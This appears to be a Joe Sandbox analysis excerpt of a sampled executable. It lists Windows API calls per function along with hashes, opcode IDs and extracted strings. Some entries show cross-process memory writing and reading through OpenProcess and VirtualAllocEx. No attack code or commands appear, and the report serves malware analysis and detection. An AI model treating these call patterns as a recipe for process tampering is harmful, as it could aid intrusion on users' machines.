                                                                                                                                        • Instruction Fuzzy Hash: B741D275900144ABDB36DFA8CC89FA9BB79EB09320F15426DF91DEB2D1C738AD01D660
                                                                                                                                        APIs
                                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 007B17D4
                                                                                                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 007B17FD
                                                                                                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 007B183C
                                                                                                                                          • Part of subcall function 007684A6: __swprintf.LIBCMT ref: 007684E5
                                                                                                                                          • Part of subcall function 007684A6: __itow.LIBCMT ref: 00768519
                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 007B1861
                                                                                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 007B1869
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1389676194-0
                                                                                                                                        • Opcode ID: 150cf49499b9a6079fc6e7dbe165075f11f7879f0542f64c41015769d95a7fa2
                                                                                                                                        • Instruction ID: f77189c07d0f8d3f3dd930ba9744a29c13dade0f06454e8aa974d1c84328a9b8
                                                                                                                                        • Opcode Fuzzy Hash: 150cf49499b9a6079fc6e7dbe165075f11f7879f0542f64c41015769d95a7fa2
                                                                                                                                        • Instruction Fuzzy Hash: 95413A35A00205DFCB11EF64C995AADBBF5FF48310B148099E90AAF361DB39ED01CBA1
                                                                                                                                        APIs
                                                                                                                                        • GetCursorPos.USER32(000000FF), ref: 0077B749
                                                                                                                                        • ScreenToClient.USER32(00000000,000000FF), ref: 0077B766
                                                                                                                                        • GetAsyncKeyState.USER32(00000001), ref: 0077B78B
                                                                                                                                        • GetAsyncKeyState.USER32(00000002), ref: 0077B799
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AsyncState$ClientCursorScreen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4210589936-0
                                                                                                                                        • Opcode ID: 4f431734d860c53e9bae62de53e844d5f5f2b7ed13f168825d315bfd3901407d
                                                                                                                                        • Instruction ID: c8f71600dd681d18244689b0d77302e701dea4a9e82add5e3669275d853490c5
                                                                                                                                        • Opcode Fuzzy Hash: 4f431734d860c53e9bae62de53e844d5f5f2b7ed13f168825d315bfd3901407d
                                                                                                                                        • Instruction Fuzzy Hash: 24415135504219FFDF199F64C888FEABB74BB55360F10835AF82996290C738AD50DBA1
                                                                                                                                        APIs
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0079C156
                                                                                                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 0079C200
                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0079C208
                                                                                                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 0079C216
                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0079C21E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePostSleep$RectWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3382505437-0
                                                                                                                                        • Opcode ID: c61e1b8595b4c1e4e8b8061e0e04b443f7e9fd38565ae90dcbf4f62f7ee08e73
                                                                                                                                        • Instruction ID: ac9de02f8c9fc878a98be501b4ac91c54b7176808e71326e6375bda1ef1ea1ea
                                                                                                                                        • Opcode Fuzzy Hash: c61e1b8595b4c1e4e8b8061e0e04b443f7e9fd38565ae90dcbf4f62f7ee08e73
                                                                                                                                        • Instruction Fuzzy Hash: 1431BFB150021DEBDF14CFA8ED4DA9E3BB5EB04315F104215F920AA1D1C7B89D04CB94
                                                                                                                                        APIs
                                                                                                                                        • IsWindowVisible.USER32(?), ref: 0079E9CD
                                                                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0079E9EA
                                                                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0079EA22
                                                                                                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0079EA48
                                                                                                                                        • _wcsstr.LIBCMT ref: 0079EA52
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3902887630-0
                                                                                                                                        • Opcode ID: 5ece3fababcbc7c4316ccc5f36ff0e4532e7b547f5ae86b28ef8418ffebe774e
                                                                                                                                        • Instruction ID: 4e90b1777f651628aee7dcb362c1d10091e9b3ad6e9101df877a83217c9860b5
                                                                                                                                        • Opcode Fuzzy Hash: 5ece3fababcbc7c4316ccc5f36ff0e4532e7b547f5ae86b28ef8418ffebe774e
                                                                                                                                        • Instruction Fuzzy Hash: 6521DA71604244BAEF25EB65AC4DE7F7BA8EF49760F10C029F809CA1A1DA69DC419790
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0077AF8E
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 007CDCC0
                                                                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 007CDCE4
                                                                                                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 007CDCFC
                                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 007CDD24
                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,007B407D,00000000), ref: 007CDD42
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Long$MetricsSystem
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2294984445-0
                                                                                                                                        • Opcode ID: 6f8ae595726a8d5023382a6d4409ed2503ec4229d073571990f360b17e707119
                                                                                                                                        • Instruction ID: 0d9d0225fc32f8c67cf240bb1991673e6da57068761db9dc53b1574a4e3651f8
                                                                                                                                        • Opcode Fuzzy Hash: 6f8ae595726a8d5023382a6d4409ed2503ec4229d073571990f360b17e707119
                                                                                                                                        • Instruction Fuzzy Hash: D421AE71A00252AFCB305F789C88F6937A5FB5A364F20473EF926CA1E0D3749C11CA90
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0079CA86
                                                                                                                                          • Part of subcall function 00767E53: _memmove.LIBCMT ref: 00767EB9
                                                                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0079CAB8
                                                                                                                                        • __itow.LIBCMT ref: 0079CAD0
                                                                                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0079CAF6
                                                                                                                                        • __itow.LIBCMT ref: 0079CB07
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$__itow$_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2983881199-0
                                                                                                                                        • Opcode ID: bf20033dfd67db15e4b6276474f8a9e333893b24a52cfc372663374a0aef51aa
                                                                                                                                        • Instruction ID: a349c9ac5b2cc48de4cd962cc0d2a2d108f953a0d9283e9a7466cc6c07e934f3
                                                                                                                                        • Opcode Fuzzy Hash: bf20033dfd67db15e4b6276474f8a9e333893b24a52cfc372663374a0aef51aa
                                                                                                                                        • Instruction Fuzzy Hash: C121C6B2701208BBDF26EAA5AC4BEDE7B69EF49750F104024FD06E7181D6798D4587A0
                                                                                                                                        APIs
                                                                                                                                        • IsWindow.USER32(00000000), ref: 007B89CE
                                                                                                                                        • GetForegroundWindow.USER32 ref: 007B89E5
                                                                                                                                        • GetDC.USER32(00000000), ref: 007B8A21
                                                                                                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 007B8A2D
                                                                                                                                        • ReleaseDC.USER32(00000000,00000003), ref: 007B8A68
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ForegroundPixelRelease
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4156661090-0
                                                                                                                                        • Opcode ID: 235df911f6ed618c071f80da8d997bf0f8451170308c90c6879dc9183af22502
                                                                                                                                        • Instruction ID: f406a4cd676c81812b0362fd4a4e92d312397aa9298c85d28ba9bbc1d17f73b1
                                                                                                                                        • Opcode Fuzzy Hash: 235df911f6ed618c071f80da8d997bf0f8451170308c90c6879dc9183af22502
                                                                                                                                        • Instruction Fuzzy Hash: 01216F75A00204EFDB10EF65CC89AAA7BF9EF48341F04C479E94A9B352DB78AD44CB51
                                                                                                                                        APIs
                                                                                                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0077B5EB
                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 0077B5FA
                                                                                                                                        • BeginPath.GDI32(?), ref: 0077B611
                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 0077B63B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3225163088-0
                                                                                                                                        APIs
                                                                                                                                        • __calloc_crt.LIBCMT ref: 00782E81
                                                                                                                                        • CreateThread.KERNEL32(?,?,00782FB7,00000000,?,?), ref: 00782EC5
                                                                                                                                        • GetLastError.KERNEL32 ref: 00782ECF
                                                                                                                                        • _free.LIBCMT ref: 00782ED8
                                                                                                                                        • __dosmaperr.LIBCMT ref: 00782EE3
                                                                                                                                          • Part of subcall function 0078889E: __getptd_noexit.LIBCMT ref: 0078889E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2664167353-0
                                                                                                                                        APIs
                                                                                                                                        • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0079B903
                                                                                                                                        • GetLastError.KERNEL32(?,0079B3CB,?,?,?), ref: 0079B90D
                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,0079B3CB,?,?,?), ref: 0079B91C
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,0079B3CB), ref: 0079B923
                                                                                                                                        • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0079B93A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 883493501-0
                                                                                                                                        APIs
                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007A8371
                                                                                                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 007A837F
                                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 007A8387
                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 007A8391
                                                                                                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007A83CD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2833360925-0
                                                                                                                                        APIs
                                                                                                                                        • CLSIDFromProgID.COMBASE ref: 0079A874
                                                                                                                                        • ProgIDFromCLSID.COMBASE(?,00000000), ref: 0079A88F
                                                                                                                                        • lstrcmpiW.KERNEL32(?,00000000), ref: 0079A89D
                                                                                                                                        • CoTaskMemFree.COMBASE(00000000), ref: 0079A8AD
                                                                                                                                        • CLSIDFromString.COMBASE(?,?), ref: 0079A8B9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3897988419-0
                                                                                                                                        APIs
                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0079B806
                                                                                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0079B810
                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0079B81F
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 0079B826
                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0079B83C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 47921759-0
                                                                                                                                        APIs
                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0079B7A5
                                                                                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0079B7AF
                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0079B7BE
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 0079B7C5
                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0079B7DB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 47921759-0
                                                                                                                                        APIs
                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0079FA8F
                                                                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 0079FAA6
                                                                                                                                        • MessageBeep.USER32(00000000), ref: 0079FABE
                                                                                                                                        • KillTimer.USER32(?,0000040A), ref: 0079FADA
                                                                                                                                        • EndDialog.USER32(?,00000001), ref: 0079FAF4
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3741023627-0
                                                                                                                                        APIs
                                                                                                                                        • EndPath.GDI32(?), ref: 0077B526
                                                                                                                                        • StrokeAndFillPath.GDI32(?,?,007DF583,00000000,?), ref: 0077B542
                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 0077B555
                                                                                                                                        • DeleteObject.GDI32 ref: 0077B568
                                                                                                                                        • StrokePath.GDI32(?), ref: 0077B583
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2625713937-0
                                                                                                                                        APIs
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 007AFAB2
                                                                                                                                        • CoCreateInstance.COMBASE(007EDA7C,00000000,00000001,007ED8EC,?), ref: 007AFACA
                                                                                                                                          • Part of subcall function 0076CAEE: _memmove.LIBCMT ref: 0076CB2F
                                                                                                                                        • CoUninitialize.COMBASE ref: 007AFD2D
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                                        • String ID: .lnk
                                                                                                                                        • API String ID: 2683427295-24824748
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: #$+
                                                                                                                                        • API String ID: 0-2552117581
                                                                                                                                        APIs
                                                                                                                                        • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,007FDC40,?,0000000F,0000000C,00000016,007FDC40,?), ref: 007A507B
                                                                                                                                          • Part of subcall function 007684A6: __swprintf.LIBCMT ref: 007684E5
                                                                                                                                          • Part of subcall function 007684A6: __itow.LIBCMT ref: 00768519
                                                                                                                                          • Part of subcall function 0076B8A7: _memmove.LIBCMT ref: 0076B8FB
                                                                                                                                        • CharUpperBuffW.USER32(?,?,00000000,?), ref: 007A50FB
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BuffCharUpper$__itow__swprintf_memmove
                                                                                                                                        • String ID: REMOVE$THIS
                                                                                                                                        • API String ID: 2528338962-776492005
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007A4D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0079C9FE,?,?,00000034,00000800,?,00000034), ref: 007A4D6B
                                                                                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0079CFC9
                                                                                                                                          • Part of subcall function 007A4D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0079CA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 007A4D36
                                                                                                                                          • Part of subcall function 007A4C65: GetWindowThreadProcessId.USER32(?,?), ref: 007A4C90
                                                                                                                                          • Part of subcall function 007A4C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0079C9C2,00000034,?,?,00001004,00000000,00000000), ref: 007A4CA0
                                                                                                                                          • Part of subcall function 007A4C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0079C9C2,00000034,?,?,00001004,00000000,00000000), ref: 007A4CB6
                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0079D036
                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0079D083
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                        • String ID: @
                                                                                                                                        • API String ID: 4150878124-2766056989
                                                                                                                                        APIs
                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,007FDBF0,00000000,?,?,?,?), ref: 007CA4E6
                                                                                                                                        • GetWindowLongW.USER32 ref: 007CA503
                                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 007CA513
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Long
                                                                                                                                        • String ID: SysTreeView32
                                                                                                                                        • API String ID: 847901565-1698111956
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 007B57E7
                                                                                                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 007B581D
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CrackInternet_memset
                                                                                                                                        • String ID: ?K{$|
                                                                                                                                        • API String ID: 1413715105-1505320054
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 007CA74F
                                                                                                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 007CA75D
                                                                                                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 007CA764
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$DestroyWindow
                                                                                                                                        • String ID: msctls_updown32
                                                                                                                                        • API String ID: 4014797782-2298589950
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 007C983D
                                                                                                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 007C984D
                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 007C9872
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$MoveWindow
                                                                                                                                        • String ID: Listbox
                                                                                                                                        • API String ID: 3315199576-2633736733
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 007CA27B
                                                                                                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 007CA290
                                                                                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 007CA29D
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend
                                                                                                                                        • String ID: msctls_trackbar32
                                                                                                                                        • API String ID: 3850602802-1010561917
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,?,00782F11,00000000), ref: 00782F79
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00782F80
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: RoInitialize$combase.dll
                                                                                                                                        • API String ID: 2574300362-340411864
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00782F4E), ref: 0078304E
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00783055
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
